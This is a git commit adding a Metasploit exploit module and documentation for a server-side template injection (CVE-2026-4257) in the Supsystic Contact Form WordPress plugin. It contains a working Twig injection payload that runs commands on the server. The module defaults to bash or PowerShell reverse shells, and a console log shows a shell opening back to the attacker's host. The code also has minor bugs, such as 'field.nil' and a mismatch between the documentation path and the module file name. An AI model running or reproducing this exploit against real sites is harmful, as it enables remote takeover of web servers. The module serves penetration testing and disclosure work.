Adds Contact Form by supsystic Wordpress plugin module and documentation

bootstrapbool · bootstrapbool · commit d7472644257d · 2026-04-09T22:22:42.000-04:00
diff --git a/documentation/modules/exploit/multi/http/wp_plugin_supsystic_contact_form_rce.md b/documentation/modules/exploit/multi/http/wp_plugin_supsystic_contact_form_rce.md
@@ -0,0 +1,67 @@
+## Vulnerable Application
+
+This module exploits a Server Side Template Injection vulnerability in
+the Wordpress plugin "Contact Form" by Supsystic versions 1.7.36 and before.
+
+The vulnerability exists in the `generateHtml()` function of the `formsViewCfs`
+class, which accepts user-controlled input via any one of the Contact Form
+field parameters given it is of an appropriate type (see the FIELD option for
+further clarification).
+
+Tested Contact Form version 1.7.36 on Ubuntu 24.04 and Windows 10.
+
+## Verification Steps
+
+1. Start `msfconsole`
+2. `use exploit/multi/http/wp_plugin_supsystic_contact_form_rce`
+3. `set RHOSTS <target>`
+4. `set TARGETURI <uri to page with contact form>` (e.g., `/wordpress/index.php/sample-page/`)
+5. `set FIELD <contact form field>` (e.g., `email` or `first_name`)
+6. `set LHOST <your_ip>`
+7. `check`
+8. `exploit`
+
+## Options
+
+### FIELD
+
+The field used to inject the payload. Must be a valid field used by the Contact
+Form of an appropriate type.
+
+The field types that accept user input and have been confirmed to lead to RCE
+are Text, Textarea, Number, Email, Time, and URL. Button field types do not
+work.
+
+The default fields are first_name, last_name, subject, message, and email,
+though anyone of these can be changed or removed.
+
+If the FIELD isn't passed the module will attempt to derive them from the html,
+however no type detection is performed so the detected field could be of an
+invalid type. Only the first derived field is used, but you can manually try
+the others that are output.
+
+## Scenarios
+
+### Exploiting Contact Form by Supsystic 1.7.36 to obtain reverse shell
+
+~~~
+msf > use exploit/multi/http/wp_plugin_supsystic_contact_form_rce
+[*] Using configured payload cmd/unix/reverse_bash
+msf exploit(multi/http/wp_plugin_supsystic_contact_form_rce) > set rhost 10.0.0.45
+rhost => 10.0.0.45
+msf exploit(multi/http/wp_plugin_supsystic_contact_form_rce) > set targeturi /wordpress/index.php/sample-page/
+targeturi => /wordpress/index.php/sample-page/
+msf exploit(multi/http/wp_plugin_supsystic_contact_form_rce) > set lhost 10.0.0.218
+lhost => 10.0.0.218
+msf exploit(multi/http/wp_plugin_supsystic_contact_form_rce) > set ssl false
+[!] Changing the SSL option's value may require changing RPORT!
+ssl => false
+msf exploit(multi/http/wp_plugin_supsystic_contact_form_rce) > exploit
+[*] Started reverse TCP handler on 10.0.0.218:4444
+[+] Found fields: first_name, last_name, email, subject, message, select, url, number, send, time, reset
+[*] Using detected field: first_name
+[*] Command shell session 1 opened (10.0.0.218:4444 -> 10.0.0.45:37848) at 2026-04-08 12:46:37 -0400
+
+id
+uid=1(daemon) gid=1(daemon) groups=1(daemon)
+~~~
diff --git a/modules/exploits/multi/http/supsystic_contact_form_cve_2026_4257.rb b/modules/exploits/multi/http/supsystic_contact_form_cve_2026_4257.rb
@@ -0,0 +1,177 @@
+##
+# This module requires Metasploit: https://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+class MetasploitModule < Msf::Exploit::Remote
+  Rank = ExcellentRanking
+
+  include Msf::Exploit::Remote::HttpClient
+
+  def initialize(info = {})
+    super(
+      update_info(
+        info,
+        'Name' => 'Supsystic Contact Form Wordpress Plugin SSTI RCE',
+        'Description' => %q{
+          This module performs SSTI achieving RCE in webpages containing the
+          Contact Form Wordpress plugin by Supsystic in versions 1.7.36 and
+          before.
+        },
+        'Author' => [
+          'Azril Fathoni', # Vulnerability Disclosure
+          'bootstrapbool', # Metasploit Module
+        ],
+        'License' => MSF_LICENSE,
+        'Privileged' => false,
+        'Targets' => [
+          [
+            'Unix/Linux Command Shell',
+            {
+              'Platform' => ['unix', 'linux'],
+              'Arch' => ARCH_CMD,
+              'Type' => :unix_cmd,
+              'DefaultOptions' => { 'PAYLOAD' => 'cmd/unix/reverse_bash' }
+            }
+          ],
+          [
+            'Windows Command Shell',
+            {
+              'Platform' => 'win',
+              'Arch' => ARCH_CMD,
+              'Type' => :win_cmd,
+              'DefaultOptions' => { 'PAYLOAD' => 'cmd/windows/powershell_reverse_tcp' }
+            }
+          ]
+        ],
+        'References' => [
+          ['CVE', '2026-4257'],
+          [
+            'URL', # Python Exploit
+            'https://github.com/bootstrapbool/cve-2026-4257'
+          ],
+        ],
+        'DisclosureDate' => '2026-03-30',
+        'DefaultTarget' => 0,
+        'Notes' => {
+          'Reliability' => [REPEATABLE_SESSION],
+          'Stability' => [CRASH_SAFE],
+          'SideEffects' => [IOC_IN_LOGS]
+        }
+      )
+    )
+    register_options(
+      [
+        Opt::RPORT(80),
+        OptString.new('FIELD', [
+          false,
+          'Valid field used by the Contact Form plugin. Defaults are first_name, last_name, subject, message, and email. Only certain types of fields will work. See documentation (info) for more details.'
+        ]),
+        OptString.new('TARGETURI', [false, 'Filepath to the webpage containing the Contact Form. Ex: /wordpress/index.php/sample-page/']),
+        OptBool.new('SSL', [false, 'Use SSL', true])
+      ]
+    )
+  end
+
+  def vulnerable?(version_str)
+    return Rex::Version.new(version_str) <= Rex::Version.new('1.7.36')
+  end
+
+  def get_version(body)
+    version_regex = /suptablesui\.min\.css\?ver=([0-9.]+)/
+    match = version_regex.match(body)
+
+    match ? match[1] : nil
+  end
+
+  def get_fields(html)
+    pattern = /data-name="([^"]+)"/
+
+    field_names = html.scan(pattern).flatten.uniq
+
+    if field_names.any?
+      print_good("Found fields: #{field_names.join(', ')}")
+      return field_names
+    else
+      print_warning('Failed to find fields.')
+      return nil
+    end
+  end
+
+  def handle_field
+    res = send_request_cgi({ 'uri' => normalize_uri(target_uri.path) })
+
+    unless res
+      fail_with(Failure::Unreachable, 'Failed to recieve a reply from server.')
+    end
+
+    unless res.code == 200
+      fail_with(Failure::UnexpectedReply, 'Unexpected reply from server.')
+    end
+
+    # Might as well check the version since we sent the request...
+    version_str = get_version(res.body)
+    if vulnerable?(version_str)
+      vprint_status("Version #{version_str} is vulnerable.")
+    else
+      vprint_warning("Version #{version_str} is not vulnerable.")
+    end
+
+    fields = get_fields(res.body)
+
+    if !fields.nil?
+      field = fields[0]
+      print_status("Using detected field: #{field}")
+      return field
+    end
+
+    if field.nil
+      fail_with(Failure::NotFound, 'Failed to resolve target field')
+    end
+  end
+
+  def send_payload(payload, field)
+    payload = '{%set a%}UTF-8{%endset%}{%set b%}BASE64{%endset%}{%set p%}' \
+      + Rex::Text.encode_base64(payload.raw) + '{%endset%}' \
+      + '{%set p = p|convert_encoding((a), (b))%}{%set e%}exec{%endset%}' \
+      + '{{_self.env.registerUndefinedFilterCallback(e[:])}}' \
+      + '{{_self.env.getFilter(p)}}'
+
+    params = { 'cfsPreFill' => 1, field => payload }
+
+    send_request_cgi({
+      'uri' => normalize_uri(target_uri.path),
+      'vars_get' => params
+    })
+  end
+
+  def exploit
+    if datastore['FIELD'].nil?
+      field = handle_field
+    else
+      field = datastore['FIELD']
+    end
+
+    send_payload(payload, field)
+  end
+
+  def check
+    res = send_request_cgi({ 'uri' => normalize_uri(target_uri.path) })
+
+    return CheckCode::Unknown unless res.code == 200
+
+    version_str = get_version(res.body)
+
+    if version_str.nil?
+      vprint_status('Failed to derive version')
+      fields = get_fields(res.body)
+      return CheckCode::Detected unless fields.nil?
+    end
+
+    if vulnerable?(version_str)
+      return CheckCode::Vulnerable("Detected version #{version_str}")
+    end
+
+    return CheckCode::Safe("Detected version #{version_str}")
+  end
+end
